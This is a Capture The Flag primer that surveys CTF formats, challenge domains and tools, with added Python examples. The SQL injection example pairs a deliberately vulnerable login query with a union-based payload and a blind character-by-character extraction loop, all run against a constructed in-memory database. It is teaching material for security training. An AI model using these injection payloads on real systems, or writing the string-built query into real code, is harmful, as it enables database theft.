Bootcamp Project: CTF Primer
So you want to play in a digital Capture The Flag (CTF)?
The first step is always finding and registering in the CTF you want to play in. After that, this guide is here to help you prepare for your first CTF, aka expect the unexpected.
First, look for local CTFs or register for some Online CTFs.
Think CTFs are over your head? Think again:
Breaking the CTFs down we have three styles to look at: Jeopardy, Offensive-Scenario, Offense-Defense.
Offensive-Scenario: Typically involves either attack scenarios or live systems to attack. These CTFs emulate penetration testing more than other forms of hacking.
Offense-Defense: Will typically put the player in the role of both defender and attacker. Often, securing one's own services is paramount, so that they can be queried by the scoring bots and shown as still up. The offensive part typically involves attacking other players' defenses and attempting to bring their services down, so that they can't score with the scoring bot.
Jeopardy: Multiple categories and domains with challenges of increasing point value. The board is modeled after the popular show Jeopardy. Often the most popular CTF format.
Some Domains to expect:
Reverse Engineering: Often involves disassembling / decompiling binaries and altering their behavior so that the flag is revealed along the new execution path.
Megapost on RE tools.
Many different disassemblers out there.
objdump is great!
ShellCode / Binary: Often involves interpreting a binary blob and either pulling a flag or transforming the data.
Go-to tools: file, strings, exiftool, VirusTotal, PEiD.
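The "pull a flag or transform the data" part of a binary-blob challenge, as an added example (not code from the original page): a `strings`-style printable-run extractor, and a single-byte XOR brute force that finds a flag `strings` alone would miss. The blob, the key (0x5a) and the flag are constructed for this example.

```python
import re

# Constructed sample blob: a fake ELF-ish header, one plain ASCII string, the flag
# XORed with a single byte (0x5a), then a little trailing junk. Not a real challenge file.
_KEY = 0x5A
_FLAG = b"flag{x0r_is_not_encryption}"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the transform is its own inverse)."""
    return bytes(b ^ key for b in data)


BLOB = (
    b"\x7fELF" + b"\x00" * 8
    + b"Nothing to see here\x00"
    + xor_bytes(_FLAG, _KEY)
    + b"\x00\x01\x02"
)


def strings(data: bytes, min_len: int = 4) -> list:
    """What the `strings` tool does: runs of printable ASCII at least min_len long."""
    return re.findall(rb"[ -~]{%d,}" % min_len, data)


def find_xored_flag(data: bytes, prefix: bytes = b"flag{"):
    """Try every single-byte XOR key and look for a flag-shaped string in the result.

    Returns (key, flag) for the first key that works, or None if no key does.
    """
    pattern = re.compile(re.escape(prefix) + rb"[ -~]*?\}")
    for key in range(256):
        m = pattern.search(xor_bytes(data, key))
        if m:
            return key, m.group(0)
    return None


if __name__ == "__main__":
    print(strings(BLOB))          # the plain string shows up, the flag does not
    print(find_xored_flag(BLOB))  # (90, b'flag{x0r_is_not_encryption}')
```

Run `strings` first because it is cheap; when the output is garbage-looking but the blob is small, a full 256-key XOR sweep costs nothing and is the next thing to try before reaching for a disassembler.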
Web / Cloud: These often involve exploiting some type of web service, typically being some type of exercise in the OWASP top 10, although this could be any web or service based exploit.
Burp or ZAP as a web intercept proxy.
sqlmap, but know manual, error-based, union-based, and blind SQLi.
Firefox is great because its proxy settings are independent of the system's, so you can point Firefox at your HTTP intercept proxy and still use Chrome or another browser for normal browsing.
Some good add-ons for Firefox: Greasemonkey, or the built-in Inspector and JavaScript console.
DirBuster to find directories or files that you can't readily see.
Any vuln or web application scanner; check whether its output can be imported into Metasploit.
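The manual SQLi techniques listed above, as an added example (not code from the original page): a deliberately vulnerable login query against an in-memory SQLite database, the union-based payload and a boolean-blind extraction loop that exploit it, and the parameterized version that does not. The tables, the user and the flag are constructed for this example.

```python
import sqlite3
import string

FLAG = "flag{constructed_union_example}"  # constructed sample, not from a real challenge


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the target's database: a users table and a hidden secrets table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE secrets(id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO users(username, password) VALUES ('alice', 'correct horse');
    """)
    con.execute("INSERT INTO secrets(flag) VALUES (?)", (FLAG,))
    return con


def login_vulnerable(con, username: str, password: str) -> list:
    """The bug: user input is pasted into the SQL text, so quotes and comments rewrite the query."""
    query = ("SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return [row[0] for row in con.execute(query)]


def login_safe(con, username: str, password: str) -> list:
    """The fix: a parameterized query; input is bound as data and never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(query, (username, password))]


# Union-based: the injected SELECT adds its rows to the result and "-- " comments out the rest.
UNION_PAYLOAD = "x' UNION SELECT flag FROM secrets-- "


def blind_extract(con, max_len: int = 64) -> str:
    """Boolean-blind: nothing is echoed except login success/failure, so pull one char per query."""
    charset = string.ascii_letters + string.digits + "{}_"
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"alice' AND substr((SELECT flag FROM secrets), {pos}, 1) = '{ch}'-- "
            if login_vulnerable(con, probe, "ignored"):
                found += ch
                break
        else:
            break  # no character matched: we ran past the end of the string
    return found


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, UNION_PAYLOAD, "anything"))  # leaks the flag
    print(login_safe(db, UNION_PAYLOAD, "anything"))        # []
    print(blind_extract(db))                                # flag, one character at a time
```

The blind loop is what sqlmap automates for you; doing it by hand once makes it obvious why a single true/false oracle (a different page, a different status code, a timing difference) is enough to dump a database.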
Network / traffic analysis: Often involves some basic network connection and service exploit, typically over an arbitrary protocol, sometimes esoteric and sometimes unique, such as ASCII patterns over telnet.
Use nmap for discovery; basic flags like -Pn to skip the host-discovery ping; nmap scripts (NSE) are HUGE.
Netcat, socat for managing socket connections.
Know the basic client connections for MySQL, LDAP, SMTP, SNMP.
nslookup, dig are useful.
Wireshark running in the background, or for analyzing pcaps.
Any version strings you find, check them on CVE Details or Exploit-DB.
Have a script ready for network socket connections, such as a python wrapper.
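A Python socket wrapper of the kind suggested above, as an added example (not code from the original page). The wrapper gives you buffered recv_until / send_line like pwntools does; to make it runnable offline, the block also includes a constructed stand-in for an "ASCII pattern over TCP" service (arithmetic questions, flag at the end) running on a localhost thread. The service, its protocol and the flag are assumptions for this example.

```python
import random
import re
import socket
import threading

FLAG = b"flag{constructed_socket_example}"  # constructed, not a real service's flag


class Remote:
    """Small pwntools-style wrapper: buffered recv_until / send_line over a TCP socket."""

    def __init__(self, host: str, port: int, timeout: float = 5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.buf = b""

    def recv_until(self, delim: bytes) -> bytes:
        """Read until delim is seen; return everything up to and including it."""
        while delim not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise EOFError("connection closed before delimiter arrived")
            self.buf += chunk
        end = self.buf.index(delim) + len(delim)
        data, self.buf = self.buf[:end], self.buf[end:]
        return data

    def send_line(self, data: bytes) -> None:
        self.sock.sendall(data + b"\n")

    def close(self) -> None:
        self.sock.close()


def _readline(conn: socket.socket) -> bytes:
    line = b""
    while not line.endswith(b"\n"):
        chunk = conn.recv(1)
        if not chunk:
            break
        line += chunk
    return line


def run_challenge_server(listener: socket.socket, rounds: int = 3) -> None:
    """Constructed stand-in for a CTF service: ask sums, hand out FLAG if every answer is right."""
    conn, _ = listener.accept()
    rng = random.Random(1337)
    with conn:
        for _ in range(rounds):
            a, b = rng.randint(1, 999), rng.randint(1, 999)
            conn.sendall(b"%d + %d = ?\n" % (a, b))
            answer = _readline(conn).strip()
            if answer != str(a + b).encode():
                conn.sendall(b"wrong\n")
                return
        conn.sendall(FLAG + b"\n")


QUESTION = re.compile(rb"(\d+) \+ (\d+) = \?")


def solve(host: str, port: int) -> bytes:
    """Client side: parse each prompt, answer it, stop when a flag-shaped line arrives."""
    r = Remote(host, port)
    try:
        while True:
            line = r.recv_until(b"\n").strip()
            if line.startswith(b"flag{"):
                return line
            m = QUESTION.match(line)
            if not m:
                raise ValueError(f"unexpected line from service: {line!r}")
            r.send_line(str(int(m.group(1)) + int(m.group(2))).encode())
    finally:
        r.close()


def demo() -> bytes:
    """Run the constructed service on an ephemeral localhost port and solve it."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=run_challenge_server, args=(listener,), daemon=True)
    t.start()
    try:
        return solve("127.0.0.1", port)
    finally:
        t.join(timeout=5)
        listener.close()


if __name__ == "__main__":
    print(demo())
```

Against a real challenge you would drop run_challenge_server and demo, point Remote at the target host and port, and only rewrite the parsing in solve; the buffering in recv_until is what keeps you from losing half a prompt when the service sends it in two TCP segments.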
Forensics: Can involve being given either a single file or a whole file system.
For a regular file, again run file, strings, and exiftool.
If you make it to a file system, grep or find.
If you are looking at a dd file system image, use The Sleuth Kit: fsstat, fls, mmls, icat.
Check timestamps, and alternate data streams on Windows (NTFS).
Crypto / Stego: Often some type of encryption challenge or puzzle, requiring some prior knowledge of encryption or use of encryption tools. While steganography is not cryptography, you will often run into a steganography challenge, so it will be helpful to be familiar with common stego tools.
OpenSSL is often used because of its ubiquity. Be ready to code.
Stegdetect is good for finding the use of very common stego tools.
Hashes / Passwords: Involves cracking hashes for points, or brute-forcing passwords or services. It's best to have a dedicated cracking machine; in a pinch you can use Amazon EC2 or a paid service. Your best bet here is to have your cracking tools, wordlists, and rainbow tables ready to go well before the challenge.
For password cracking have ready John the Ripper, oclHashcat, or something quick online for NT hash lookups.
Trivia / Misc: Often involves random hacker facts or random hacker-themed challenges, typically adding hacker culture to the challenge. You've seen 'War Games' right?
Programming: Sometimes there are tasks that involve solving simple challenges either in high volume or at high frequency, requiring automation. Often in Offense-Defense style CTFs, automating one's defenses is the best bet.
General Toolsets:
Kali Linux 64 bit and Windows 64 bit
(You will want 64-bit OSes so that if you receive a 64-bit binary for a reverse engineering challenge you can run it and disassemble it. A 64-bit OS can also run 32-bit binaries (on Linux this needs the 32-bit compatibility libraries installed), so you will be able to reverse engineer those as well.)
Always mind your connection! Make sure you're on a good connection; use TLS if on wifi, check your certs, or use a VPN.
Internal messages / file shares: know the rules regarding them and be careful of Wireshark / sniffing / shoulder surfing; use good communications and plan for subterfuge. This is infosec after all. For more good info on preparing for a CTF, check out the CTF Field Guide!